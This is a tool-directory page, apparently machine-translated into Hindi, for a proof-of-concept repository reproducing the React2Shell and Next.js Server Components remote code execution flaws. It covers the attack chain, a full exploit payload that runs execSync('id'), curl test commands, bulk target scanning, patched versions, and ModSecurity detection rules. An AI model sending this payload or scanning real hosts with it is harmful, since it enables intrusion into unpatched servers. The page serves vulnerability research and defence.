Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-55182-POC — React2Shell (CVE-2025-55182) और Next.js RSC RCE (CVE-2025-66478) भेद्यताओं को पुन: पेश करने के लिए न्यूनतम MVP। एक्सप्लॉइट पेलोड, बैच स्कैनिंग स्क्रिप्ट और शमन के लिए ModSecurity WAF नियम शामिल हैं। | Kitploit
उपकरण/GitHubGitHub/huahuai23/cve-2025-55182-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubhuahuai23/cve-2025-55182-poc

CVE-2025-55182-POC

React2Shell (CVE-2025-55182) और Next.js RSC RCE (CVE-2025-66478) भेद्यताओं को पुन: पेश करने के लिए न्यूनतम MVP। एक्सप्लॉइट पेलोड, बैच स्कैनिंग स्क्रिप्ट और शमन के लिए ModSecurity WAF नियम शामिल हैं।

रिपॉजिटरी देखें
129 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-55182 / CVE-2025-66478 भेद्यता पुनरुत्पादन वातावरण

यह React2Shell (CVE-2025-55182) और Next.js RSC RCE (CVE-2025-66478) भेद्यताओं को पुनरुत्पादित करने के लिए एक न्यूनतम MVP है।

⚠️ चेतावनी

यह प्रोजेक्ट केवल सुरक्षा अनुसंधान और शैक्षिक उद्देश्यों के लिए है। कृपया इसे उत्पादन वातावरण या अनधिकृत सिस्टम पर उपयोग न करें।

भेद्यता अवलोकन

CVE-2025-55182 React Server Components में एक गंभीर भेद्यता है, जो निम्न को प्रभावित करती है:

  • React: 19.0.0, 19.1.0, 19.1.1, 19.2.0
  • Next.js: ≥14.3.0-canary.77, ≥15, ≥16

हमलावर एक विशेष रूप से तैयार किए गए multipart/form-data अनुरोध के माध्यम से Flight Protocol की deserialization भेद्यता का लाभ उठाकर रिमोट कोड निष्पादन (RCE) प्राप्त कर सकता है।

हमले का सिद्धांत

  1. Chunk रेफरेंस प्राप्त करना: आंतरिक Chunk ऑब्जेक्ट प्राप्त करने के लिए $@N सिंटैक्स का उपयोग करें
  2. प्रोटोटाइप चेन प्रदूषण: $1:__proto__:then के माध्यम से दुर्भावनापूर्ण then विधि इंजेक्ट करें
  • निष्पादन ट्रिगर करना: Server Action await के समय प्रदूषित then विधि को कॉल करता है
  • कंस्ट्रक्टर अपहरण: _formData.get को Function कंस्ट्रक्टर में अपहरण करें
  • कोड निष्पादन: Blob deserialization के माध्यम से मनमाना कोड निष्पादित करें
  • त्वरित प्रारंभ

    1. निर्भरताएँ स्थापित करें

    root@kitploit:~
    npm install
    # 或
    yarn install
    # 或
    pnpm install
    

    2. डेवलपमेंट सर्वर प्रारंभ करें

    root@kitploit:~
    npm run dev
    

    सर्वर http://localhost:3000 पर प्रारंभ होगा।

    3. भेद्यता का परीक्षण करें

    प्रदान की गई परीक्षण स्क्रिप्ट का उपयोग करें:

    root@kitploit:~
    # 单个目标测试
    ./test-exploit.sh http://localhost:3000
    
    # 或直接使用 curl
    curl -X POST http://localhost:3000/ \
      -H "Next-Action: x" \
      -H "Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad" \
      --data-binary @exploit-payload.txt
    

    यदि भेद्यता मौजूद है, तो आपको प्रतिक्रिया में uid= जैसा आउटपुट दिखाई देगा (id कमांड का निष्पादन परिणाम)।

    फ़ाइल संरचना

    root@kitploit:~
    .
    ├── app/
    │   ├── actions.ts              # Server Actions(漏洞触发点)
    │   ├── page.tsx                # 主页面
    │   ├── layout.tsx              # 布局
    │   └── globals.css             # 全局样式
    ├── package.json                # 依赖配置(使用受影响版本)
    ├── next.config.js              # Next.js 配置
    ├── test-exploit.sh             # 单个目标漏洞测试脚本
    ├── scan-targets.sh             # 批量扫描脚本
    ├── exploit-payload.txt         # Exploit payload 文件
    ├── Cve-2025-55182-modsecurity-rules.conf      # ModSecurity 防护规则
    └── README.md                   # 本文件
    

    परीक्षण स्क्रिप्ट विवरण

    1. test-exploit.sh - एकल लक्ष्य परीक्षण

    जाँचें कि क्या किसी एकल URL में भेद्यता मौजूद है:

    root@kitploit:~
    chmod +x test-exploit.sh
    ./test-exploit.sh http://localhost:3000
    

    विशेषता: यदि प्रतिक्रिया में uid= या gid= शामिल है, तो भेद्यता मौजूद है।

    2. scan-targets.sh - बल्क स्कैनिंग

    कई लक्ष्य URL को बल्क में स्कैन करें:

    root@kitploit:~
    # 创建目标列表文件
    cat > targets.txt << EOF
    http://localhost:3000
    https://example.com
    https://api.example.com:8080
    EOF
    
    # 执行批量扫描
    chmod +x scan-targets.sh
    ./scan-targets.sh targets.txt
    

    स्कैन परिणाम vulnerable_hosts.csv में सहेजे जाएँगे।

    Payload संरचना का विश्लेषण

    root@kitploit:~
    {
      "then": "$1:__proto__:then",           // 劫持 then 方法
      "status": "resolved_model",             // 控制执行路径
      "reason": -1,
      "value": "{\"then\":\"$B1337\"}",      // 触发 Blob 反序列化
      "_response": {
        "_prefix": "var res=process.mainModule.require('child_process').execSync('id',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",
        "_chunks": "$Q2",
        "_formData": {
          "get": "$1:constructor:constructor"  // 劫持为 Function
        }
      }
    }
    

    मुख्य बिंदु:

    1. $@0: पहले form-data फ़ील्ड को संदर्भित करता है, Chunk ऑब्जेक्ट प्राप्त करता है
    2. $1:proto:then: Chunk.prototype.then तक पहुँचता है
    3. _response._prefix: इंजेक्ट किया गया दुर्भावनापूर्ण कोड (जिसे Function कंस्ट्रक्टर द्वारा निष्पादित किया जाएगा)
    4. $1:constructor:constructor: Object.constructor.constructor = Function

    समाधान

    विकल्प 1: सुधारित संस्करण में अपग्रेड करें (अनुशंसित)

    • React: 19.0.1, 19.1.2, 19.2.1 या उससे नया
    • Next.js: 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7, 16.0.7 या उससे नया
    root@kitploit:~
    npm install [email protected] [email protected] [email protected]
    

    विकल्प 2: ModSecurity WAF नियम तैनात करें (अस्थायी शमन)

    यदि तुरंत अपग्रेड संभव नहीं है, तो अस्थायी शमन के लिए ModSecurity नियम तैनात किए जा सकते हैं।

    Apache + mod_security

    root@kitploit:~
    # 1. 安装 mod_security
    sudo apt-get install libapache2-mod-security2
    
    # 2. 复制规则文件
    sudo cp modsecurity-rules.conf /etc/modsecurity/
    
    # 3. 在 Apache 配置中引入规则
    sudo vim /etc/apache2/mods-enabled/security2.conf
    # 添加: Include /etc/modsecurity/modsecurity-rules.conf
    
    # 4. 重启 Apache
    sudo systemctl restart apache2
    

    Nginx + ModSecurity

    root@kitploit:~
    # 1. 安装 ModSecurity for Nginx
    sudo apt-get install libnginx-mod-security
    
    # 2. 复制规则文件
    sudo cp modsecurity-rules.conf /etc/nginx/modsec/
    
    # 3. 在 Nginx 配置中启用
    sudo vim /etc/nginx/nginx.conf
    # 在 http 或 server 块中添加:
    # modsecurity on;
    # modsecurity_rules_file /etc/nginx/modsec/modsecurity-rules.conf;
    
    # 4. 重启 Nginx
    sudo systemctl restart nginx
    

    नियम पहचान विशेषताएँ

    ModSecurity नियम निम्नलिखित विशेषताओं को अवरोधित करेंगे:

    • ✅ Flight Protocol विशेषताएँ ($@N, $BN)
    • ✅ प्रोटोटाइप चेन प्रदूषण (__proto__, constructor:constructor)
    • ✅ खतरनाक Node.js मॉड्यूल कॉल (process.mainModule.require, require('child_process'))
    • ✅ कमांड निष्पादन फ़ंक्शन (execSync, exec)
    • ✅ आंतरिक ऑब्जेक्ट संचालन (_response, _chunks, _formData, _prefix)
    • ✅ Server Action अनुरोध हेडर (Next-Action, RSC-Action-ID)

    ⚠️ ध्यान दें: WAF नियम केवल अस्थायी शमन उपाय हैं और पूर्ण सुरक्षा प्रदान नहीं कर सकते। सुधारित संस्करण में अपग्रेड करना आवश्यक है।

    सुरक्षा अनुशंसाएँ

    यदि आपका एप्लिकेशन प्रभावित हो सकता है:

    1. तुरंत परीक्षण करें: अपने एप्लिकेशन का परीक्षण करने के लिए test-exploit.sh स्क्रिप्ट का उपयोग करें
    2. तुरंत अपग्रेड करें: सुधारित संस्करण में अपग्रेड करें
    3. कुंजियाँ रोटेट करें: सभी पर्यावरण चर, API कुंजियाँ और डेटाबेस पासवर्ड रोटेट करें
    4. लॉग ऑडिट करें: संदिग्ध Next-Action अनुरोधों के लिए एक्सेस लॉग की जाँच करें
    5. WAF तैनात करें: अपग्रेड से पहले अस्थायी सुरक्षा के रूप में ModSecurity नियम तैनात करें

    त्वरित परीक्षण के लिए curl कमांड

    यदि आप सीधे curl का उपयोग करके परीक्षण करना चाहते हैं (स्क्रिप्ट का उपयोग किए बिना):

    root@kitploit:~
    curl -X POST http://localhost:3000/ \
      -H "Next-Action: x" \
      -H "Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad" \
      -H "X-Nextjs-Request-Id: b5dce965" \
      --data-binary @exploit-payload.txt
    

    यदि लौटाए गए परिणाम में uid= या gid= शामिल है, तो भेद्यता मौजूद है।

    संदर्भ सामग्री

    • Vercel आधिकारिक घोषणा
    • React GHSA
    • Next.js GHSA
    • CVE PoC (React)
    • CVE Scanner (Next.js)
    • ModSecurity दस्तावेज़

    आभार

    • Lachlan Davidson - इस भेद्यता की खोज की और उसे जिम्मेदारीपूर्वक रिपोर्ट किया
    • Meta Security & React Team
    • Vercel Team

    लाइसेंस

    यह प्रोजेक्ट केवल शैक्षिक उद्देश्यों के लिए है। इस कोड का उपयोग करते समय कृपया संबंधित कानूनों और विनियमों का पालन करें।

    टूल डाउनलोड करें